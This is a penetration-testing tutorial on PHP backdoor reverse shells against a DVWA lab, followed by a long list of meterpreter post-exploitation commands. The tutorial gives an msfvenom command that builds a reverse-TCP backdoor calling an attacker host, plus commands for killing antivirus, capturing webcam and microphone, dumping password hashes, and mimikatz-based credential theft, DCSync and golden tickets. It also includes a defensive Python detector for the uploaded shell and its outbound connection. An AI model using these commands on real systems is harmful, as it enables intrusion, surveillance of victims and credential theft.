Note:
The content of this chapter is for learning only; do not use it for illegal purposes (be a good white hat).
(1) What is a backdoor reverse shell
A backdoor reverse shell means that after an attacker has successfully compromised a computer, they install a "backdoor program" on it and have that program connect back to them with a reverse shell. The "backdoor" is usually a maliciously modified version of an otherwise legitimate script, software tool, or operating system component. It hides on the compromised computer and opens a special channel through which the attacker's shell can manipulate the machine remotely.
When the backdoor program runs, it initiates a connection to a predefined attacker host, allowing the attacker to reach the target computer through the reverse shell. In this way the attacker can use the "backdoor program" to easily control the target computer remotely after login verification. In many cases attackers use this method to perform all kinds of malicious operations, including modifying or manipulating system files and viewing, tampering with, and stealing sensitive user information.
(2) Experiment demonstration
1. Use the listener module - handler
use exploit/multi/handler
2. Configure the attack payload
Set the PHP payload:
Command: set payload php/meterpreter/reverse_tcp
3. Generate a PHP backdoor for the attack and obtain a meterpreter session
Command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.23.44 lport=4444 R>shell.php
-p: specifies the payload to use; lhost is the IP of the attacking machine and lport is the port the attacking machine listens on
R>shell.php: writes the generated PHP backdoor to the file shell.php
4. Upload the PHP backdoor file to the target website (DVWA shooting range)
On the Kali attack machine, the handler starts listening when the run or lportm command is executed. If a user then accesses the Trojan file shell.php, msf drops into a meterpreter session, which indicates that the server has executed shell.php.
We can now successfully obtain the username of the host through the backdoor.
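As an added defender-side example (not part of the original tutorial), the following Python checks a web server for the two traces the procedure above leaves behind: the uploaded shell.php from step 4, and the outbound connection from the web server's own account to the handler's lhost:lport from step 3. The web-server account names, the allowed outbound ports and all sample records are constructed assumptions.

```python
# Detection logic for the PHP reverse-shell backdoor described in the tutorial.
# All constants and records below are constructed assumptions, not real system output.
from pathlib import PurePosixPath

# Assumption: an Apache/PHP-style host that executes these extensions anywhere under
# the web root, including double extensions such as "photo.php.jpg" when a handler matches.
EXECUTABLE_EXTS = {".php", ".phtml", ".php3", ".php5", ".phar"}
WEB_USERS = {"www-data", "apache", "nginx"}       # accounts the web server runs as
LISTEN_PORTS = {80, 443}                          # local side is the server on these ports
ALLOWED_OUTBOUND = {80, 443, 3306}                # assumption: HTTP(S) and the DB tier only

def suspicious_uploads(paths):
    """Return uploaded paths whose name carries any server-executable extension."""
    hits = []
    for p in paths:
        suffixes = {s.lower() for s in PurePosixPath(p).suffixes}
        if suffixes & EXECUTABLE_EXTS:
            hits.append(p)
    return hits

def port_of(addr):
    """'192.168.23.44:4444' -> 4444 (IPv4 host:port form only)."""
    return int(addr.rsplit(":", 1)[1])

def outbound_from_web_user(conns):
    """Flag established connections that the web-server user initiated towards ports a web
    tier has no business contacting. Record: (user, pid, process, local, remote, state)."""
    hits = []
    for user, pid, proc, local, remote, state in conns:
        if user not in WEB_USERS or state != "ESTABLISHED":
            continue
        if port_of(local) in LISTEN_PORTS:        # a client talking to us, not us calling out
            continue
        if port_of(remote) not in ALLOWED_OUTBOUND:
            hits.append((pid, proc, remote))
    return hits

# Constructed sample data: one upload directory listing and one connection table
UPLOADS = ["uploads/avatar.png", "uploads/shell.php", "uploads/photo.php.jpg", "uploads/cv.pdf"]
CONNECTIONS = [
    ("www-data", 1201, "apache2", "10.0.0.5:80", "10.0.0.9:51234", "ESTABLISHED"),         # client
    ("www-data", 1201, "apache2", "10.0.0.5:40211", "10.0.0.20:3306", "ESTABLISHED"),      # DB query
    ("www-data", 1207, "apache2", "10.0.0.5:40212", "192.168.23.44:4444", "ESTABLISHED"),  # reverse shell
    ("root", 800, "sshd", "10.0.0.5:22", "10.0.0.9:50002", "ESTABLISHED"),                 # not a web user
]

if __name__ == "__main__":
    print("suspicious uploads:", suspicious_uploads(UPLOADS))
    print("outbound from web user:", outbound_from_web_user(CONNECTIONS))
```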
The following are meterpreter commands that can be used against Windows systems:
View process: ps
View the current process number: getpid
View system information: sysinfo
Check whether the target machine is a virtual machine: run post/windows/gather/checkvm
View complete network settings: route
View current permissions: getuid
Automatic privilege escalation: getsystem
Close the antivirus software: run post/windows/manage/killav
Start Remote Desktop Protocol: run post/windows/manage/enable_rdp
List currently logged on users: run post/windows/gather/enum_logged_on_users
View currently installed applications: run post/windows/gather/enum_applications
Grab a screenshot of the target machine: load espia; screengrab
Get camera devices: webcam_list
Control camera: webcam_snap
Live webcam: webcam_stream
Control recording: record_mic
View the current working directory on the target machine: pwd
View the current working directory on the local (attacker) machine: getlwd
Dump the password hashes of the local users: run hashdump
Output format: Username:SID:LM Hash:NTLM Hash:::
You can also use the following command, which requires higher privileges, to export the hashes: run windows/gather/smart_hashdump
Grab the username and password stored for automatic login: run windows/gather/credentials/windows_autologin
Obtain plaintext passwords directly (note that this function requires SYSTEM privileges, so enter getsystem first)
First enter load kiwi in the terminal to load the kiwi extension
creds_all: List all credentials
creds_kerberos: List all kerberos credentials
creds_msv: List all msv credentials
creds_ssp: List all ssp credentials
creds_tspkg: List all tspkg credentials
creds_wdigest: List all wdigest credentials
dcsync: Retrieve user account information via DCSync
dcsync_ntlm: Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create: create a golden ticket
kerberos_ticket_list: list kerberos tickets
kerberos_ticket_purge: purge kerberos tickets
kerberos_ticket_use: use kerberos tickets
kiwi_cmd: execute a mimikatz command, followed by the mimikatz.exe command itself
lsa_dump_sam: dump the SAM from LSA
lsa_dump_secrets: dump the LSA secrets
password_change: change password
wifi_list: list the wifi profiles of the current user
wifi_list_shared: list shared wifi profiles/encodings